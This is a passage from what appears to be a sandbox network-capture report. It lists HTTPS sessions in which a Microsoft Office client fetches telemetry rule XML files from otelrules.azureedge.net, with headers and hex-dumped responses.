                                                                                                                                                                                        2024-11-24 01:14:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        138192.168.2.54990813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:18 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:18 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                        x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011418Z-178bfbc474bp8mkvhC1NYCzqnn000000050g00000000gn8w
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:18 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        139192.168.2.54990913.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:20 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:20 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                        x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011420Z-178bfbc474btvfdfhC1NYCa2en000000056g00000000m7tp
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:20 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        140192.168.2.54991113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:20 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:20 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                        x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011420Z-178bfbc474bpscmfhC1NYCfc2c00000003vg0000000097qc
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:20 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        141192.168.2.54991013.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:20 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:20 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:20 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                        x-ms-request-id: 15687058-401e-005b-477d-3b9c0c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011420Z-174c587ffdf8fcgwhC1TEBnn7000000003z00000000029rp
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:20 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        142192.168.2.54991213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:20 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:20 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE584C214"
                                                                                                                                                                                        x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011420Z-178bfbc474btvfdfhC1NYCa2en00000005dg000000002vw4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:20 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        143192.168.2.54991313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:20 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:20 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1407
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                        x-ms-request-id: 23fc118c-601e-0084-474e-3c6b3f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011420Z-178bfbc474bmqmgjhC1NYCy16c00000005cg0000000054qs
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:21 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        144192.168.2.54991413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:22 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:22 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:22 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1370
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                        x-ms-request-id: a4032f19-b01e-0084-598d-3bd736000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011422Z-174c587ffdfb485jhC1TEBmc1s00000003e000000000qk5e
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:22 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        145192.168.2.54991513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:22 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:22 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                        x-ms-request-id: 8149a5d6-a01e-001e-117b-3b49ef000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011422Z-174c587ffdfp4vpjhC1TEBybqw00000003qg00000000dzu4
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:23 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        146192.168.2.54991613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:22 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:22 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                        x-ms-request-id: ad980b0f-801e-0083-20fe-3df0ae000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011422Z-178bfbc474bscnbchC1NYCe7eg00000005dg00000000863q
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:23 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        147192.168.2.54991713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
